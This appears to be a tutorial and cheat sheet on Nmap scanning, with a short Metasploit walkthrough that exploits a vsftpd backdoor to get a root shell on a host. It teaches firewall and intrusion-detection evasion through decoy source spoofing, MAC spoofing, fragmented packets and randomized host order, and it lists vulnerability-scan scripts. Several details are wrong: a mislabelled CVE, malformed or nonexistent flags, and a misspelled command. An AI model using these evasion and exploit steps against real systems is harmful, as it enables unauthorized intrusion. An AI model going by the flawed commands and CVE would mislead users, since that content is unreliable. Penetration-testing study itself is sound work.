# sV Services & Versions
# iL to read the content of a file
				
			
				
					sudo nmap -sV -iL iplist.txt
				
			
				
					# -O to know the OS
				
			
				
					sudo nmap -O -iL iplist.txt
				
			
				
					-T3 setup the time
# 0 The slowest
# 5 The faster
# 3 is default

# Never use 0, it is too slow (45 minutes)
# And you will be blocked by the firewall
				
			
				
					
sudo nmap scanme.nmap.org -T3


				
			
				
					# -D RND:20: This option tells Nmap to use spoofed source addresses 
# when sending packets to the target host. 
# The RND keyword tells Nmap to generate random source addresses, 
# and the 20 value tells Nmap to generate 20 different source addresses.
				
			
				
					sudo nmap 10.81.102.23 -D RND:20

SCTP stands for Stream Control Transmission Protocol. It is a connection-oriented transport layer protocol that provides reliable, in-sequence transport of data between two endpoints that have established a connection in a computer network.

SCTP is similar to TCP in that it provides reliable, in-sequence delivery of data. However, it has several advantages over TCP, including:

  • Multihoming: SCTP allows both endpoints of a connection to have multiple IP addresses. This makes it more resilient to network failures, as traffic can be routed to the best available IP address.
  • Multistreaming: SCTP allows multiple streams of data to be sent over a single connection. This can improve performance for applications that need to send different types of data, such as voice, video, and text.
  • Partial reliability: SCTP can be configured to deliver data streams with different levels of reliability. This is useful for applications that need to deliver some types of data more reliably than others.

SCTP is used in a variety of applications, including:

  • Voice over IP (VoIP): SCTP is used to provide reliable transport for VoIP calls.
  • Mobile networks: SCTP is used to provide reliable transport for data services in mobile networks.
  • Signaling systems: SCTP is used to carry signaling traffic between different components of signaling systems, such as SS7 and Diameter.
  • Multimedia applications: SCTP can be used to improve the performance of multimedia applications, such as video streaming and online gaming.
				
					# --randomize-hosts: This option tells Nmap to scan the hosts 
# in random order.
# to avoid being blocked by the firewall
# Outside the radar of the destination router
				
			
				
					sudo nmap -iL iplist.txt --randomize-hosts
 
				
			
				
					sudo nmap -p 22 -iL iplist.txt
# To check in the file all the PCs with the port 22 open.

# -spoof-mac 0: This option tells Nmap
# to use the all-zeros MAC address (00:00:00:00:00:00) 
# as the source MAC address 
# for all packets sent to the target host.
				
			
				
					sudo nmap 10.81.102.24 -spoof-mac 0
				
			
				
					# The -f option tells Nmap to send fragmented packets
# to the target host. This can be useful for bypassing firewalls 
# and intrusion detection systems that may block non-fragmented packets.
				
			
				
					sudo nmap 10.81.102.24 -f
				
			
				
					# All the scripts ready to download
				
			
				
					https://nmap.org/nsedoc/scripts/
				
			
				
					# In Kali Linux, the scripts are here
				
			
				
					cd /usr/share/nmap/scripts
				
			
				
					# --script smb-vuln-ms17-010.nse: 
# This option tells Nmap to run the Nmap script 
# smb-vuln-ms17-010.nse on each of the target hosts.
# This script checks for the MS17-010 vulnerability
# in SMBv1 servers.
				
			
				
					sudo nmap -iL iplist.txt --script smb-vuln-ms17-010.nse
				
			
				
					# --script ftp-vsftp-backdoor: This option tells Nmap to run the Nmap script
# ftp-vsftp-backdoor on each of the target hosts. 
# This script checks for the VSFTPD backdoor vulnerability 
# CVE-2021-35962.
# -p 21: This option tells Nmap to scan the target hosts 
# on port 21, which is the default port for FTP.
				
			
				
					sudo nmap -iL iplist.txt --script ftp-vsftp-backdoor -p 21
				
			
				
					#  --script vuln: This option tells Nmap to run all of the 
# vulnerability
# scripts in the Nmap script database.

# This command is useful for scanning networks for hosts that are 
# vulnerable
# to known vulnerabilities. 
# The Nmap script database contains hundreds of scripts that check 
# for a wide variety of vulnerabilities, including remote code 
# execution
# vulnerabilities, privilege escalation vulnerabilities, 
# and information disclosure vulnerabilities.
				
			
				
					sudo nmap -iL iplist.txt --script vuln
				
			
				
					METASPLOIT by Rapid7
				
			
				
					# METASPLOIT by Rapid7
sudo msfconsole
msf6 > search vsftp
# use option 0 
# First option found
set rhosts 10.81.102.123
run
whoiam
ifconfig
# 10.81.102.123 as root

  1. Basic Scanning:

    • `nmap target`: Basic port scan on a single target.
    • `nmap -O target`: Perform OS detection on a target.
    • `nmap -sV target`: Determine the versions of services running on a target.

  2. Advanced Scanning:

    • `nmap -A target`: Comprehensive scan including OS detection, version detection, script scanning, and traceroute.
    • `nmap -sC target`: Perform a default set of scripts against a target.
    • `nmap -sU target`: Scan for UDP ports on a target.
    • `nmap -sT target`: TCP connect scan (default scan type).

  3. Service and Version Detection:

    • `nmap -sS target`: Stealth SYN scan (less noisy than TCP connect scan).
    • `nmap -sN target`: Null scan (no flags set).
    • `nmap -sX target`: Xmas scan (sets multiple flags).
    • `nmap -sP target`: Ping scan to determine if a host is up.

  4. Scripting and Scripting Engine:

    • `nmap --script=scriptname target`: Run a specific Nmap script against a target.
    • `nmap --script-args=arg1,arg2 target`: Pass arguments to Nmap scripts.

  5. Timing and Performance:

    • `nmap -n target`: Do not resolve hostnames (faster).
    • `nmap -R target`: Perform reverse DNS resolution on all hosts.
    • `nmap -f target`: Fragment packets to bypass firewalls.
    • `nmap -iL file`: Scan hosts listed in a file.
    • `nmap -z target`: Perform a ping scan before port scanning to speed up the process.

  6. Output and Formatting:

    • `nmap -oG grepable target`: Output in grepable format for further processing.
    • `nmap -oX xml target`: Output in XML format.
    • `nmap -oN normal target`: Output in normal human-readable format (default).
    • `nmap -oP output.txt`: Save ping scan results to a file.

  7. Miscellaneous:

    • `nmap -v`: Increase verbosity level.
    • `nmap -T4 target`: Set timing template to aggressive (higher speed).
    • `nmap -PN target`: Assume all hosts are up (skip ping scan).
    • `nmap --max-retries=3 target`: Set the maximum number of retries for failed probes.